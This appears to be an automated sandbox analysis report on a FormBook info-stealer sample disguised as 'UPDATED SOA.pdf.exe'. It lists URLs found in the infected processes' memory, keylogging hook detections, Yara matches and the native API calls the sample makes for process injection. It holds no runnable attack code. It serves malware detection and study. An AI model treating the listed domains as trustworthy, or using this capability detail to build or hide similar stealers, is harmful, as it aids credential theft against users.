                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xiaohezhibo.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xingmengzhibo.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xiyezhibo.com
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xuetuzhibo.com
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xuetuzhibo.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yanyuzhibo.com
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yemizhibo.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yeyezhibo.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yeyingzhibo.com
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yeyouzhibo.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yimeizhibo.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yingyingzhibo.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yingzhuzhibo.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yinhezhibo.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.youqizhibo.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yourreality.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yuechengzhibo.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yueliangzhibo.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yuguozhibo.com
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yundingzhibo.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yunmengzhibo.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yunmengzhibo.net/binding
                Source: UPDATED SOA.pdf.exe, 00000000.00000002.1809244973.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zisezhibo.net
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zootech.net
                Source: expand.exe, 00000012.00000002.4146791030.0000000007878000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: expand.exe, 00000012.00000002.4144575211.00000000054E8000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000003A58000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://assets.storage.infomaniak.com/fonts/font-awesome/4.3.0/css/font-awesome.min.css
                Source: expand.exe, 00000012.00000002.4144575211.00000000054E8000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000003A58000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://assets.storage.infomaniak.website/images/background/unsplash/lqQlmcPt9Qg-large.jpg
                Source: S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000003A58000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://assets.storage.infomaniak.website/images/background/unsplash/lqQlmcPt9Qg-medium.jpg
                Source: expand.exe, 00000012.00000002.4144575211.00000000054E8000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000003A58000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://assets.storage.infomaniak.website/images/background/unsplash/lqQlmcPt9Qg-small.jpg
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://beian.miit.gov.cn/#/Integrated/index
                Source: expand.exe, 00000012.00000002.4146791030.0000000007878000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: expand.exe, 00000012.00000002.4146791030.0000000007878000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: expand.exe, 00000012.00000002.4146791030.0000000007878000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: expand.exe, 00000012.00000002.4146791030.0000000007878000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: expand.exe, 00000012.00000002.4146791030.0000000007878000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: expand.exe, 00000012.00000002.4146791030.0000000007878000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: expand.exe, 00000012.00000002.4144575211.000000000567A000.00000004.10000000.00040000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.00000000054E8000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000003BEA000.00000004.00000001.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000003A58000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
                Source: expand.exe, 00000012.00000002.4144575211.0000000005E54000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.00000000043C4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Poppins:400
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://img.ucdl.pp.uc.cn/upload_files/wdj_web/public/img/favicon.ico
                Source: expand.exe, 00000012.00000002.4142996530.0000000000974000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: expand.exe, 00000012.00000002.4142996530.0000000000974000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: expand.exe, 00000012.00000002.4142996530.0000000000974000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: expand.exe, 00000012.00000002.4142996530.0000000000974000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                Source: expand.exe, 00000012.00000002.4142996530.0000000000974000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033T
                Source: expand.exe, 00000012.00000002.4142996530.0000000000974000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: expand.exe, 00000012.00000002.4142996530.0000000000974000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: expand.exe, 00000012.00000003.2219419578.0000000007853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: expand.exe, 00000012.00000002.4144575211.000000000567A000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000003BEA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://push.zhanzhang.baidu.com/push.js
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ucan.25pp.com/Wandoujia_wandoujia_qrbinded.apk
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://white.anva.org.cn/
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.12377.cn/
                Source: expand.exe, 00000012.00000002.4146791030.0000000007878000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: expand.exe, 00000012.00000002.4144575211.000000000567A000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000003BEA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
                Source: expand.exe, 00000012.00000002.4144575211.0000000006178000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.00000000046E8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: expand.exe, 00000012.00000002.4144575211.00000000054E8000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000003A58000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.infomaniak.com/fr/hebergement
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
                Source: expand.exe, 00000012.00000002.4146653519.0000000007560000.00000004.00000800.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144575211.000000000662E000.00000004.10000000.00040000.00000000.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4143953574.0000000004B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zzlz.gsxt.gov.cn/

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Contains functionality to log keystrokes (.Net Source)
                Source: UPDATED SOA.pdf.exe, HookManager.cs.Net Code: EnsureSubscribedToGlobalKeyboardEvents
                Source: TKgtDXuaZu.exe.0.dr, HookManager.cs.Net Code: EnsureSubscribedToGlobalKeyboardEvents
                Source: 18.2.expand.exe.4ddcd14.2.raw.unpack, HookManager.cs.Net Code: EnsureSubscribedToGlobalKeyboardEvents
                Source: 19.2.S1OoUcW6nwo.exe.334cd14.1.raw.unpack, HookManager.cs.Net Code: EnsureSubscribedToGlobalKeyboardEvents
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 0_2_0D5F9778 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,0_2_0D5F9778

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 9.2.UPDATED SOA.pdf.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.UPDATED SOA.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.2036376886.0000000001830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.4144018297.0000000004600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.4142807594.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2032904691.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.4143977148.00000000045B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.4143949544.0000000003210000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2036740856.00000000019D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: UPDATED SOA.pdf.exe
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0042CA53 NtClose,9_2_0042CA53
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01502B60 NtClose,LdrInitializeThunk,9_2_01502B60
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01502DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_01502DF0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01502C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_01502C70
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015035C0 NtCreateMutant,LdrInitializeThunk,9_2_015035C0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01504340 NtSetContextThread,9_2_01504340
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01504650 NtSuspendThread,9_2_01504650
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01502BF0 NtAllocateVirtualMemory,9_2_01502BF0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01502BE0 NtQueryValueKey,9_2_01502BE0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01502B80 NtQueryInformationFile,9_2_01502B80
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01502BA0 NtEnumerateValueKey,9_2_01502BA0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01502AD0 NtReadFile,9_2_01502AD0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01502AF0 NtWriteFile,9_2_01502AF0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01502AB0 NtWaitForSingleObject,9_2_01502AB0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01502D10 NtMapViewOfSection,9_2_01502D10
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01502D00 NtSetInformationFile,9_2_01502D00
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01502D30 NtUnmapViewOfSection,9_2_01502D30
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01502DD0 NtDelayExecution,9_2_01502DD0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01502DB0 NtEnumerateKey,9_2_01502DB0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01502C60 NtCreateKey,9_2_01502C60
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01502C00 NtQueryInformationProcess,9_2_01502C00
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01502CC0 NtQueryVirtualMemory,9_2_01502CC0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01502CF0 NtOpenProcess,9_2_01502CF0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01502CA0 NtQueryInformationToken,9_2_01502CA0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01502F60 NtCreateProcessEx,9_2_01502F60
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01502F30 NtCreateSection,9_2_01502F30
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01502FE0 NtCreateFile,9_2_01502FE0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01502F90 NtProtectVirtualMemory,9_2_01502F90
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01502FB0 NtResumeThread,9_2_01502FB0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01502FA0 NtQuerySection,9_2_01502FA0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01502E30 NtWriteVirtualMemory,9_2_01502E30
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01502EE0 NtQueueApcThread,9_2_01502EE0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01502E80 NtReadVirtualMemory,9_2_01502E80
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01502EA0 NtAdjustPrivilegesToken,9_2_01502EA0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01503010 NtOpenDirectoryObject,9_2_01503010
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01503090 NtSetValueKey,9_2_01503090
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015039B0 NtGetContextThread,9_2_015039B0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01503D70 NtOpenThread,9_2_01503D70
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_01503D10 NtOpenProcessToken,9_2_01503D10
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 0_2_02303E0C0_2_02303E0C
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 0_2_023073900_2_02307390
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 0_2_0683B22A0_2_0683B22A
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 0_2_068388880_2_06838888
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 0_2_068344A70_2_068344A7
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 0_2_068344E00_2_068344E0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 0_2_068365430_2_06836543
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 0_2_068365500_2_06836550
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 0_2_068382C10_2_068382C1
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 0_2_06834D400_2_06834D40
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 0_2_06834D500_2_06834D50
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 0_2_068369880_2_06836988
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 0_2_068349180_2_06834918
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 0_2_068369780_2_06836978
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 0_2_0CD908880_2_0CD90888
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 0_2_0D48A5C80_2_0D48A5C8
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 0_2_0D4802880_2_0D480288
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 0_2_0D48A5B80_2_0D48A5B8
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 0_2_0D5283790_2_0D528379
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 0_2_0D5FDDD00_2_0D5FDDD0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 0_2_0D5F61220_2_0D5F6122
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 0_2_0D5F22F00_2_0D5F22F0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 0_2_0D5F22F00_2_0D5F22F0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 0_2_0D5F2F720_2_0D5F2F72
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 0_2_0D5F61220_2_0D5F6122
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_004188F39_2_004188F3
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0041009C9_2_0041009C
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_004100A39_2_004100A3
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0042F0B39_2_0042F0B3
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0040218C9_2_0040218C
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_004021909_2_00402190
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_004102C39_2_004102C3
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_00416AF39_2_00416AF3
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0040E2A39_2_0040E2A3
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0040E3E79_2_0040E3E7
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0040E3F39_2_0040E3F3
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_00402FF09_2_00402FF0
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015581589_2_01558158
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_014C01009_2_014C0100
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_0156A1189_2_0156A118
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015881CC9_2_015881CC
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 9_2_015901AA9_2_015901AA
